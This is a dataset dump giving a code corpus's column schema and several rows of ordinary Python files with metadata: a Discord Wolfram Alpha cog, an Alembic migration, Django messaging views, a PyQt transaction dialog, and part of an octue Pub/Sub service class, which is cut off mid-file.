Columns and dtypes:

| column | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
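As a quick orientation (not part of the dataset itself), the sketch below shows how rows with this schema could be screened on a few of the quality-signal columns once they have been loaded into a pandas DataFrame. The DataFrame `df` and the thresholds are assumptions chosen for illustration, not values taken from this dump.

```python
# Hypothetical filtering sketch: assumes the rows are already loaded into a
# pandas DataFrame named `df`; the thresholds below are illustrative only.
import pandas as pd


def filter_rows(df: pd.DataFrame) -> pd.DataFrame:
    """Keep Python files that look hand-written and not overly repetitive."""
    mask = (
        (df["lang"] == "Python")
        & (df["qsc_code_frac_chars_dupe_5grams_quality_signal"] < 0.3)   # low 5-gram repetition
        & (df["qsc_code_cate_autogen_quality_signal"] == 0)              # not flagged as auto-generated
        & (df["qsc_code_num_chars_line_max_quality_signal"] < 1000)      # no extremely long lines
    )
    return df[mask]
```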
hexsha: 900d82f05310f821f29ddc9642e0427552a38aae | size: 2,687 | ext: py | lang: Python
repo (max_stars / max_issues / max_forks): Wyn10/aikaterna-cogs, path wolfram/wolfram.py, head a7fd5930f90b4046296ce98406639219c38302a7, licenses ["MIT"]
max_stars_count: null | max_issues_count: null | max_forks_count: 1 (2019-03-30T05:18:42.000Z to 2019-03-30T05:18:42.000Z)
content:
import os
import aiohttp
from discord.ext import commands
import xml.etree.ElementTree as ET
from cogs.utils.dataIO import dataIO
from .utils import checks
from .utils.chat_formatting import escape_mass_mentions
from .utils.chat_formatting import box
from __main__ import send_cmd_help


class Wolfram:
    def __init__(self, bot):
        self.bot = bot
        self.settings = dataIO.load_json("data/wolfram/settings.json")

    @commands.command(pass_context=True, name="wolfram", aliases=["ask"])
    async def _wolfram(self, ctx, *arguments: str):
        """
        Ask Wolfram Alpha any question
        """
        api_key = self.settings["WOLFRAM_API_KEY"]
        if api_key:
            url = "http://api.wolframalpha.com/v2/query?"
            query = " ".join(arguments)
            payload = {"input": query, "appid": api_key}
            headers = {"user-agent": "Red-cog/1.0.0"}
            conn = aiohttp.TCPConnector(verify_ssl=False)
            session = aiohttp.ClientSession(connector=conn)
            async with session.get(url, params=payload, headers=headers) as r:
                result = await r.text()
            session.close()
            root = ET.fromstring(result)
            a = []
            for pt in root.findall(".//plaintext"):
                if pt.text:
                    a.append(pt.text.capitalize())
            if len(a) < 1:
                message = "There is as yet insufficient data for a meaningful answer."
            else:
                message = "\n".join(a[0:3])
        else:
            message = (
                "No API key set for Wolfram Alpha. Get one at http://products.wolframalpha.com/api/"
            )
        message = escape_mass_mentions(message)
        await self.bot.say(box(message))

    @commands.command(pass_context=True, name="setwolframapi", aliases=["setwolfram"])
    @checks.is_owner()
    async def _setwolframapi(self, ctx, key: str):
        """
        Set the api-key
        """
        if key:
            self.settings["WOLFRAM_API_KEY"] = key
            dataIO.save_json("data/wolfram/settings.json", self.settings)
            await self.bot.say("Key set.")
        else:
            await send_cmd_help(ctx)


def check_folder():
    if not os.path.exists("data/wolfram"):
        print("Creating data/wolfram folder...")
        os.makedirs("data/wolfram")


def check_file():
    data = {}
    data["WOLFRAM_API_KEY"] = False
    f = "data/wolfram/settings.json"
    if not dataIO.is_valid_json(f):
        print("Creating default settings.json...")
        dataIO.save_json(f, data)


def setup(bot):
    check_folder()
    check_file()
    n = Wolfram(bot)
    bot.add_cog(n)
| 32.373494
| 100
| 0.593971
| 331
| 2,687
| 4.691843
| 0.398792
| 0.030908
| 0.036703
| 0.04443
| 0.151964
| 0.079845
| 0
| 0
| 0
| 0
| 0
| 0.003646
| 0.285448
| 2,687
| 82
| 101
| 32.768293
| 0.805208
| 0
| 0
| 0.045455
| 0
| 0.015152
| 0.183886
| 0.030069
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060606
| false
| 0.030303
| 0.136364
| 0
| 0.212121
| 0.030303
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
hexsha: 900fd7a3396de18f3541a06d832b5444ad752082 | size: 671 | ext: py | lang: Python
repo (max_stars / max_issues / max_forks): Josephat-n/myBlog, path migrations/versions/98f3e3ad195c_update_blog_to_add_a_title.py, head d2e3b368617cd3ca55b6bd40e6950122967e1d9f, licenses ["MIT"]
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
"""update blog to add a title.
Revision ID: 98f3e3ad195c
Revises: 2d98c5165674
Create Date: 2019-12-02 22:58:10.377423
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '98f3e3ad195c'
down_revision = '2d98c5165674'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('blogs', sa.Column('title', sa.String(length=255), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('blogs', 'title')
# ### end Alembic commands ###
| 23.137931
| 84
| 0.690015
| 86
| 671
| 5.325581
| 0.616279
| 0.058952
| 0.091703
| 0.100437
| 0.19214
| 0.19214
| 0.19214
| 0.19214
| 0
| 0
| 0
| 0.103074
| 0.175857
| 671
| 28
| 85
| 23.964286
| 0.725136
| 0.460507
| 0
| 0
| 0
| 0
| 0.135385
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.2
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
hexsha: 901066d43a75d83ccca11050c805f23f07e56a57 | size: 2,691 | ext: py | lang: Python
repo (max_stars / max_issues / max_forks): ThusharaX/mumbleapi, path message/views.py, head 8435fe9d86869cce81961f42c9860fa3810c171b, licenses ["Apache-2.0"]
max_stars_count: 187 (2021-04-24T14:49:44.000Z to 2022-03-31T14:25:22.000Z) | max_issues_count: 119 (2021-04-24T18:08:43.000Z to 2022-01-09T00:57:19.000Z) | max_forks_count: 174 (2021-04-24T15:57:23.000Z to 2022-03-11T02:09:04.000Z)
content:
from rest_framework.decorators import api_view, permission_classes
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework import status
from users.models import UserProfile
from .serializers import MessageSerializer, ThreadSerializer
from .models import UserMessage, Thread
from django.db.models import Q


@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def read_message(request, pk):
    try:
        thread = Thread.objects.get(id=pk)
        messages = thread.messages.all()
        un_read = thread.messages.filter(is_read=False)
        for msg in un_read:
            msg.is_read = True
            msg.save()
        serializer = MessageSerializer(messages, many=True)
        return Response(serializer.data)
    except Exception as e:
        return Response({'details': f"{e}"}, status=status.HTTP_204_NO_CONTENT)


@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def CreateThread(request):
    sender = request.user.userprofile
    recipient_id = request.data.get('recipient_id')
    recipient = UserProfile.objects.get(id=recipient_id)
    if recipient_id is not None:
        try:
            thread, created = Thread.objects.get_or_create(sender=sender, reciever=recipient)
            serializer = ThreadSerializer(thread, many=False)
            return Response(serializer.data)
        except UserProfile.DoesNotExist:
            return Response({'detail': 'User with that id doesnt not exists'})
    else:
        return Response({'details': 'Recipient id not found'})


@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def get_messages(request):
    user = request.user.userprofile
    threads = Thread.objects.filter(Q(sender=user) | Q(reciever=user))
    serializer = ThreadSerializer(threads, many=True)
    return Response(serializer.data)


@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def create_message(request):
    sender = request.user.userprofile
    data = request.data
    thread_id = data.get('thread_id')
    if thread_id:
        message = data.get('message')
        thread = Thread.objects.get(id=thread_id)
        if thread:
            if message is not None:
                message = UserMessage.objects.create(thread=thread, sender=sender, body=message)
                message.save()
                serializer = ThreadSerializer(thread, many=False)
                return Response(serializer.data)
            else:
                return Response({'details': 'Content for message required'})
        else:
            return Response({'details': 'Thread not found'})
    else:
        return Response({'details': 'Please provide other user id'})
| 39
| 94
| 0.687105
| 309
| 2,691
| 5.873786
| 0.271845
| 0.077135
| 0.057851
| 0.077135
| 0.287603
| 0.215978
| 0.176309
| 0.076033
| 0.076033
| 0
| 0
| 0.00141
| 0.209216
| 2,691
| 69
| 95
| 39
| 0.851504
| 0
| 0
| 0.338462
| 0
| 0
| 0.079866
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061538
| false
| 0
| 0.123077
| 0
| 0.338462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
hexsha: 9010af2b84b0a8a7a8c133b624651330f5e4d485 | size: 3,691 | ext: py | lang: Python
repo (max_stars / max_issues / max_forks): redstorm45/money_analyst, path widgets/dialogs/transactions_editor.py, head 9ccf8aa4cd7bad7aff21a82ce4219406009f126a, licenses ["Apache-2.0"]
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
import PyQt5.QtWidgets as Qtw
import PyQt5.QtCore as QtCore
from widgets.labels import LabelsWidget
DATE_FORMAT = 'yyyy-MM-dd'
class TransactionDialog(Qtw.QDialog):
"""
A dialog used to edit a transaction
"""
def __init__(self, parent, model_cat, desc='', category=0, amount=0, date=''):
super(TransactionDialog, self).__init__(parent)
self.validated = False
self.validated_data = None
self.model_cat = model_cat
self.all_labels = model_cat.get_labels()
self.setModal(True)
edit_desc_label = Qtw.QLabel("Description:", self)
self.edit_desc = Qtw.QLineEdit(self)
edit_cat_label = Qtw.QLabel("Catégorie:", self)
self.edit_cat = Qtw.QComboBox(self)
self.edit_cat.insertItems(0, self.model_cat.get_names())
self.edit_cat.setInsertPolicy(self.edit_cat.NoInsert)
edit_amount_label = Qtw.QLabel("Montant (centimes):", self)
self.edit_amount = Qtw.QLineEdit('0', self)
self.edit_amount.textChanged.connect(self.updateAmountHint)
self.edit_amount_hint = Qtw.QLabel('soit: 0,00€', self)
self.edit_date = Qtw.QCalendarWidget(self)
self.edit_labels = LabelsWidget(self, self.all_labels)
buttons_widget = Qtw.QWidget(self)
buttons_layout = Qtw.QHBoxLayout()
cancel_button = Qtw.QPushButton("Annuler", buttons_widget)
cancel_button.clicked.connect(self.reject)
validate_button = Qtw.QPushButton("Valider", buttons_widget)
validate_button.clicked.connect(self.validate)
buttons_layout.addWidget(cancel_button)
buttons_layout.addWidget(validate_button)
buttons_widget.setLayout(buttons_layout)
layout = Qtw.QGridLayout()
layout.addWidget(edit_desc_label, 0, 0)
layout.addWidget(self.edit_desc, 1, 0)
layout.addWidget(edit_cat_label, 2, 0)
layout.addWidget(self.edit_cat, 3, 0)
layout.addWidget(edit_amount_label, 4, 0)
layout.addWidget(self.edit_amount, 5, 0)
layout.addWidget(self.edit_amount_hint, 6, 0)
layout.addWidget(self.edit_date, 0, 1, 7, 1)
layout.addWidget(self.edit_labels, 7, 0, 1, 2)
layout.addWidget(buttons_widget, 8, 0, 1, 2)
self.setLayout(layout)
def updateAmountHint(self):
try:
val = int(self.edit_amount.text())
S = 'soit: ' + str(val//100) + ',' + str(val%100).zfill(2) + '€'
self.edit_amount_hint.setText(S)
except ValueError:
self.edit_amount_hint.setText('soit: ?')
def setData(self, desc, category, amount, date, labels):
self.edit_desc.setText(desc)
self.edit_cat.setCurrentText(self.model_cat.get_name_for_id(category))
self.edit_amount.setText(str(amount))
self.edit_date.setSelectedDate(QtCore.QDate.fromString(date, DATE_FORMAT))
self.edit_labels.set_labels(labels)
def validate(self):
if self.edit_desc.text() == '':
box = Qtw.QMessageBox()
box.setText('Rajoutez une description à la transaction')
box.exec_()
return
try:
amount = int(self.edit_amount.text())
except ValueError:
box = Qtw.QMessageBox()
box.setText('Montant invalide')
box.exec_()
return
self.validated = True
cat_id = self.model_cat.get_id_for_name(self.edit_cat.currentText())
date = self.edit_date.selectedDate().toString(DATE_FORMAT)
labels = self.edit_labels.labels.copy()
self.validated_data = (self.edit_desc.text(), cat_id, amount, date, labels)
self.accept()
| 38.051546
| 83
| 0.648605
| 460
| 3,691
| 5
| 0.265217
| 0.107826
| 0.06087
| 0.06
| 0.12087
| 0.026087
| 0
| 0
| 0
| 0
| 0
| 0.014904
| 0.236521
| 3,691
| 96
| 84
| 38.447917
| 0.800568
| 0.009483
| 0
| 0.12987
| 0
| 0
| 0.040934
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051948
| false
| 0
| 0.038961
| 0
| 0.12987
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
hexsha: 9010dcd0fdbf2d57ab797fb8bac064a9780ede3f | size: 20,416 | ext: py | lang: Python
repo (max_stars / max_issues / max_forks): octue/octue-sdk-python, path octue/cloud/pub_sub/service.py, head 31c6e9358d3401ca708f5b3da702bfe3be3e52ce, licenses ["MIT"]
max_stars_count: 5 (2020-10-01T12:43:10.000Z to 2022-03-14T17:26:25.000Z) | max_issues_count: 322 (2020-06-24T15:55:22.000Z to 2022-03-30T11:49:28.000Z) | max_forks_count: null
content:
import base64
import concurrent.futures
import json
import logging
import sys
import time
import traceback as tb
import uuid
from google.api_core import retry
from google.cloud import pubsub_v1
import octue.exceptions
import twined.exceptions
from octue.cloud.credentials import GCPCredentialsManager
from octue.cloud.pub_sub import Subscription, Topic
from octue.cloud.pub_sub.logging import GooglePubSubHandler
from octue.mixins import CoolNameable
from octue.resources.manifest import Manifest
from octue.utils.encoders import OctueJSONEncoder
from octue.utils.exceptions import create_exceptions_mapping
from octue.utils.objects import get_nested_attribute
logger = logging.getLogger(__name__)
OCTUE_NAMESPACE = "octue.services"
ANSWERS_NAMESPACE = "answers"
# Switch message batching off by setting max_messages to 1. This minimises latency and is recommended for
# microservices publishing single messages in a request-response sequence.
BATCH_SETTINGS = pubsub_v1.types.BatchSettings(max_bytes=10 * 1000 * 1000, max_latency=0.01, max_messages=1)
EXCEPTIONS_MAPPING = create_exceptions_mapping(
globals()["__builtins__"], vars(twined.exceptions), vars(octue.exceptions)
)
class Service(CoolNameable):
"""A Twined service that can be used in two modes:
* As a server accepting questions (input values and manifests), running them through its app, and responding to the
requesting service with the results of the analysis.
* As a requester of answers from another Service in the above mode.
Services communicate entirely via Google Pub/Sub and can ask and/or respond to questions from any other Service that
has a corresponding topic on Google Pub/Sub.
:param octue.resources.service_backends.ServiceBackend backend: the object representing the type of backend the service uses
:param str|None service_id: a string UUID optionally preceded by the octue services namespace "octue.services."
:param callable|None run_function: the function the service should run when it is called
:return None:
"""
def __init__(self, backend, service_id=None, run_function=None):
if service_id is None:
self.id = f"{OCTUE_NAMESPACE}.{str(uuid.uuid4())}"
elif not service_id:
raise ValueError(f"service_id should be None or a non-falsey value; received {service_id!r} instead.")
else:
if service_id.startswith(OCTUE_NAMESPACE):
self.id = service_id
else:
self.id = f"{OCTUE_NAMESPACE}.{service_id}"
self.backend = backend
self.run_function = run_function
self._credentials = GCPCredentialsManager(backend.credentials_environment_variable).get_credentials()
self.publisher = pubsub_v1.PublisherClient(credentials=self._credentials, batch_settings=BATCH_SETTINGS)
super().__init__()
def __repr__(self):
return f"<{type(self).__name__}({self.name!r})>"
def serve(self, timeout=None, delete_topic_and_subscription_on_exit=False):
"""Start the Service as a server, waiting to accept questions from any other Service using Google Pub/Sub on
the same Google Cloud Platform project. Questions are responded to asynchronously.
:param float|None timeout: time in seconds after which to shut down the service
:param bool delete_topic_and_subscription_on_exit: if `True`, delete the service's topic and subscription on exit
:return None:
"""
topic = Topic(name=self.id, namespace=OCTUE_NAMESPACE, service=self)
topic.create(allow_existing=True)
subscriber = pubsub_v1.SubscriberClient(credentials=self._credentials)
subscription = Subscription(
name=self.id,
topic=topic,
namespace=OCTUE_NAMESPACE,
project_name=self.backend.project_name,
subscriber=subscriber,
expiration_time=None,
)
subscription.create(allow_existing=True)
future = subscriber.subscribe(subscription=subscription.path, callback=self.answer)
logger.debug("%r is waiting for questions.", self)
with subscriber:
try:
future.result(timeout=timeout)
except (TimeoutError, concurrent.futures.TimeoutError, KeyboardInterrupt):
future.cancel()
if delete_topic_and_subscription_on_exit:
topic.delete()
subscription.delete()
def answer(self, question, timeout=30):
"""Answer a question (i.e. run the Service's app to analyse the given data, and return the output values to the
asker). Answers are published to a topic whose name is generated from the UUID sent with the question, and are
in the format specified in the Service's Twine file.
:param dict|Message question:
:param float|None timeout: time in seconds to keep retrying sending of the answer once it has been calculated
:raise Exception: if any exception arises during running analysis and sending its results
:return None:
"""
data, question_uuid, forward_logs = self.parse_question(question)
topic = self.instantiate_answer_topic(question_uuid)
if forward_logs:
analysis_log_handler = GooglePubSubHandler(publisher=self.publisher, topic=topic)
else:
analysis_log_handler = None
try:
analysis = self.run_function(
analysis_id=question_uuid,
input_values=data["input_values"],
input_manifest=data["input_manifest"],
analysis_log_handler=analysis_log_handler,
)
if analysis.output_manifest is None:
serialised_output_manifest = None
else:
serialised_output_manifest = analysis.output_manifest.serialise()
self.publisher.publish(
topic=topic.path,
data=json.dumps(
{
"type": "result",
"output_values": analysis.output_values,
"output_manifest": serialised_output_manifest,
"message_number": topic.messages_published,
},
cls=OctueJSONEncoder,
).encode(),
retry=retry.Retry(deadline=timeout),
)
topic.messages_published += 1
logger.info("%r responded to question %r.", self, question_uuid)
except BaseException as error: # noqa
self.send_exception_to_asker(topic, timeout)
raise error
def parse_question(self, question):
"""Parse a question in the Google Cloud Pub/Sub or Google Cloud Run format.
:param dict|Message question:
:return (dict, str, bool):
"""
try:
# Parse Google Cloud Pub/Sub question format.
data = json.loads(question.data.decode())
question.ack()
logger.info("%r received a question.", self)
except Exception:
# Parse Google Cloud Run question format.
data = json.loads(base64.b64decode(question["data"]).decode("utf-8").strip())
question_uuid = get_nested_attribute(question, "attributes.question_uuid")
forward_logs = bool(int(get_nested_attribute(question, "attributes.forward_logs")))
return data, question_uuid, forward_logs
def instantiate_answer_topic(self, question_uuid, service_id=None):
"""Instantiate the answer topic for the given question UUID for the given service ID.
:param str question_uuid:
:param str|None service_id: the ID of the service to ask the question to
:return octue.cloud.pub_sub.topic.Topic:
"""
return Topic(
name=".".join((service_id or self.id, ANSWERS_NAMESPACE, question_uuid)),
namespace=OCTUE_NAMESPACE,
service=self,
)
def ask(
self,
service_id,
input_values=None,
input_manifest=None,
subscribe_to_logs=True,
allow_local_files=False,
timeout=30,
):
"""Ask a serving Service a question (i.e. send it input values for it to run its app on). The input values must
be in the format specified by the serving Service's Twine file. A single-use topic and subscription are created
before sending the question to the serving Service - the topic is the expected publishing place for the answer
from the serving Service when it comes, and the subscription is set up to subscribe to this.
:param str service_id: the UUID of the service to ask the question to
:param any input_values: the input values of the question
:param octue.resources.manifest.Manifest|None input_manifest: the input manifest of the question
:param bool subscribe_to_logs: if `True`, subscribe to logs from the remote service and handle them with the local log handlers
:param bool allow_local_files: if `True`, allow the input manifest to contain references to local files - this should only be set to `True` if the serving service will have access to these local files
:param float|None timeout: time in seconds to keep retrying sending the question
:return (octue.cloud.pub_sub.subscription.Subscription, str): the response subscription and question UUID
"""
if not allow_local_files:
if (input_manifest is not None) and (not input_manifest.all_datasets_are_in_cloud):
raise octue.exceptions.FileLocationError(
"All datasets of the input manifest and all files of the datasets must be uploaded to the cloud "
"before asking a service to perform an analysis upon them. The manifest must then be updated with "
"the new cloud locations."
)
question_topic = Topic(name=service_id, namespace=OCTUE_NAMESPACE, service=self)
if not question_topic.exists():
raise octue.exceptions.ServiceNotFound(f"Service with ID {service_id!r} cannot be found.")
question_uuid = str(uuid.uuid4())
response_topic = self.instantiate_answer_topic(question_uuid, service_id)
response_topic.create(allow_existing=False)
response_subscription = Subscription(
name=response_topic.name,
topic=response_topic,
namespace=OCTUE_NAMESPACE,
project_name=self.backend.project_name,
subscriber=pubsub_v1.SubscriberClient(credentials=self._credentials),
)
response_subscription.create(allow_existing=False)
if input_manifest is not None:
input_manifest = input_manifest.serialise()
self.publisher.publish(
topic=question_topic.path,
data=json.dumps({"input_values": input_values, "input_manifest": input_manifest}).encode(),
question_uuid=question_uuid,
forward_logs=str(int(subscribe_to_logs)),
retry=retry.Retry(deadline=timeout),
)
logger.info("%r asked a question %r to service %r.", self, question_uuid, service_id)
return response_subscription, question_uuid
def wait_for_answer(self, subscription, service_name="REMOTE", timeout=30):
"""Wait for an answer to a question on the given subscription, deleting the subscription and its topic once
the answer is received.
:param octue.cloud.pub_sub.subscription.Subscription subscription: the subscription for the question's answer
:param str service_name: an arbitrary name to refer to the service subscribed to by (used for labelling its remote log messages)
:param float|None timeout: how long to wait for an answer before raising a TimeoutError
:raise TimeoutError: if the timeout is exceeded
:return dict: dictionary containing the keys "output_values" and "output_manifest"
"""
subscriber = pubsub_v1.SubscriberClient(credentials=self._credentials)
message_handler = OrderedMessageHandler(
message_puller=self._pull_message,
subscriber=subscriber,
subscription=subscription,
service_name=service_name,
)
with subscriber:
try:
return message_handler.handle_messages(timeout=timeout)
finally:
subscription.delete()
subscription.topic.delete()
def send_exception_to_asker(self, topic, timeout=30):
"""Serialise and send the exception being handled to the asker.
:param octue.cloud.pub_sub.topic.Topic topic:
:param float|None timeout: time in seconds to keep retrying sending of the exception
:return None:
"""
exception_info = sys.exc_info()
exception = exception_info[1]
exception_message = f"Error in {self!r}: {exception}"
traceback = tb.format_list(tb.extract_tb(exception_info[2]))
self.publisher.publish(
topic=topic.path,
data=json.dumps(
{
"type": "exception",
"exception_type": type(exception).__name__,
"exception_message": exception_message,
"traceback": traceback,
"message_number": topic.messages_published,
}
).encode(),
retry=retry.Retry(deadline=timeout),
)
topic.messages_published += 1
def _pull_message(self, subscriber, subscription, timeout):
"""Pull a message from the subscription, raising a `TimeoutError` if the timeout is exceeded before succeeding.
:param octue.cloud.pub_sub.subscription.Subscription subscription: the subscription the message is expected on
:param float|None timeout: how long to wait in seconds for the message before raising a TimeoutError
:raise TimeoutError|concurrent.futures.TimeoutError: if the timeout is exceeded
:return dict: message containing data
"""
start_time = time.perf_counter()
while True:
no_message = True
attempt = 1
while no_message:
logger.debug("Pulling messages from Google Pub/Sub: attempt %d.", attempt)
pull_response = subscriber.pull(
request={"subscription": subscription.path, "max_messages": 1},
retry=retry.Retry(),
)
try:
answer = pull_response.received_messages[0]
no_message = False
except IndexError:
logger.debug("Google Pub/Sub pull response timed out early.")
attempt += 1
if timeout is not None and (time.perf_counter() - start_time) > timeout:
raise TimeoutError(
f"No message received from topic {subscription.topic.path!r} after {timeout} seconds.",
)
continue
subscriber.acknowledge(request={"subscription": subscription.path, "ack_ids": [answer.ack_id]})
logger.debug("%r received a message related to question %r.", self, subscription.topic.path.split(".")[-1])
return json.loads(answer.message.data.decode())
class OrderedMessageHandler:
"""A handler for Google Pub/Sub messages that ensures messages are handled in the order they were sent.
:param callable message_puller: function that pulls a message from the subscription
:param google.pubsub_v1.services.subscriber.client.SubscriberClient subscriber: a Google Pub/Sub subscriber
:param octue.cloud.pub_sub.subscription.Subscription subscription: the subscription messages are pulled from
:param str service_name: an arbitrary name to refer to the service subscribed to by (used for labelling its remote log messages)
:param dict|None message_handlers: a mapping of message handler names to callables that handle each type of message
:return None:
"""
def __init__(self, message_puller, subscriber, subscription, service_name="REMOTE", message_handlers=None):
self.message_puller = message_puller
self.subscriber = subscriber
self.subscription = subscription
self.service_name = service_name
self._waiting_messages = {}
self._previous_message_number = -1
self._message_handlers = message_handlers or {
"log_record": self._handle_log_message,
"exception": self._handle_exception,
"result": self._handle_result,
}
def handle_messages(self, timeout=30):
"""Pull messages and handle them in the order they were sent until a result is returned by a message handler,
then return that result.
:param float|None timeout: how long to wait for an answer before raising a `TimeoutError`
:raise TimeoutError: if the timeout is exceeded before receiving the final message
:return dict:
"""
start_time = time.perf_counter()
pull_timeout = None
while True:
if timeout is not None:
run_time = time.perf_counter() - start_time
if run_time > timeout:
raise TimeoutError(
f"No final answer received from topic {self.subscription.topic.path!r} after {timeout} seconds.",
)
pull_timeout = timeout - run_time
message = self.message_puller(self.subscriber, self.subscription, timeout=pull_timeout)
self._waiting_messages[message["message_number"]] = message
try:
